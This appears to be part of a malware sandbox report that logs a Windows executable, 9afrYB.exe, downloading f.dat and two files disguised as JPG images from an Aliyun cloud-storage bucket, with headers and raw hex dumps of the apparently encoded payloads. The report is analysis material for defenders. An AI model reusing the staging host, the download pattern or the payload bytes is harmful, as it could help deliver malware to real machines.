                                                                                2025-01-10 01:27:15 UTC4096INData Raw: 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77 bb
                                                                                Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
                                                                                2025-01-10 01:27:15 UTC4096INData Raw: 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f b3
                                                                                Data Ascii: ctABCKw4|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT*&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=*SV.c{]=bh&g}|6
                                                                                2025-01-10 01:27:15 UTC4096INData Raw: 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be 39
                                                                                Data Ascii: t'FCDEhNOP}bBibcd- O|lno=\{{|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~9
                                                                                2025-01-10 01:27:15 UTC4096INData Raw: 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f fe
                                                                                Data Ascii: :^@AB bHIJ?jPQR<rXYZ)z`abBhij*Jpqrs<Syz{4s%~}k*yxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
                                                                                2025-01-10 01:27:15 UTC955INData Raw: 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37 20
                                                                                Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8*Sp1l_g;#c!;3c"#%+''&k*+-#//>S235-77


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.549983118.178.60.94436764C:\Users\user\Documents\9afrYB.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:27:18 UTC110OUTGET /f.dat HTTP/1.1
                                                                                User-Agent: GetData
                                                                                Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:27:18 UTC558INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:27:18 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 879
                                                                                Connection: close
                                                                                x-oss-request-id: 678077767CF842363003B2D6
                                                                                Accept-Ranges: bytes
                                                                                ETag: "E54C4296F011EC91D935AA353C936E34"
                                                                                Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 11142793972884948456
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000113
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: 5UxClvAR7JHZNao1PJNuNA==
                                                                                x-oss-server-time: 3
                                                                                2025-01-10 01:27:18 UTC879INData Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31
                                                                                Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.2.549984118.178.60.94436764C:\Users\user\Documents\9afrYB.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:27:19 UTC115OUTGET /FOM-50.jpg HTTP/1.1
                                                                                User-Agent: GetData
                                                                                Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:27:20 UTC546INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:27:20 GMT
                                                                                Content-Type: image/jpeg
                                                                                Content-Length: 55085
                                                                                Connection: close
                                                                                x-oss-request-id: 6780777809E5983336648FC8
                                                                                Accept-Ranges: bytes
                                                                                ETag: "DC44AE348E6A74B3A74871020FDFAC74"
                                                                                Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 12339968747348072397
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000105
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: 3ESuNI5qdLOnSHECD9+sdA==
                                                                                x-oss-server-time: 5
                                                                                2025-01-10 01:27:20 UTC3550INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                                Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                                2025-01-10 01:27:20 UTC4096INData Raw: 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f 96
                                                                                Data Ascii: |{Atwutse>4HYAVVSRt2Q|(M8B&0:**)TW"TDn*2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
                                                                                2025-01-10 01:27:20 UTC4096INData Raw: 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa 81
                                                                                Data Ascii: FG*2<L\"h((JIr0SCF4=8;987@3A>s](Sn*&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
                                                                                2025-01-10 01:27:20 UTC4096INData Raw: b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 95 2c 2c 4f 8b 14 7f 7f f4
                                                                                Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn*{75|?flLOIVw)`]b* hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
                                                                                2025-01-10 01:27:20 UTC4096INData Raw: 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b a1
                                                                                Data Ascii: xryQGT*_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALr*i.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{|}{
                                                                                2025-01-10 01:27:20 UTC4096INData Raw: 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b 47
                                                                                Data Ascii: PQT@'Bed^%]\[.n/RQPw_GFEC6*:9FQ4( "pI$et)3q}Y/I*Z!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}G
                                                                                2025-01-10 01:27:20 UTC4096INData Raw: 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94 0a
                                                                                Data Ascii: yv#{wofKlY%'\*JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u*`vRP;\Xf b$*m*-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
                                                                                2025-01-10 01:27:20 UTC4096INData Raw: ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0 f5
                                                                                Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
                                                                                2025-01-10 01:27:20 UTC4096INData Raw: 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f 81
                                                                                Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-*C.G!"#$g()*+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{|
                                                                                2025-01-10 01:27:20 UTC4096INData Raw: ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 6f 90 91
                                                                                Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~o


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.2.549985118.178.60.94436764C:\Users\user\Documents\9afrYB.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:27:21 UTC115OUTGET /FOM-51.jpg HTTP/1.1
                                                                                User-Agent: GetData
                                                                                Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:27:22 UTC548INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:27:22 GMT
                                                                                Content-Type: image/jpeg
                                                                                Content-Length: 4859125
                                                                                Connection: close
                                                                                x-oss-request-id: 6780777A94C77F39307106AB
                                                                                Accept-Ranges: bytes
                                                                                ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02"
                                                                                Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 9060732723227198118
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000105
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: 7myj7qf5scgQWa71cKKMAg==
                                                                                x-oss-server-time: 13
                                                                                2025-01-10 01:27:22 UTC3548INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                                Data Ascii: JFIFZExifMM*JQQ%Q%CC
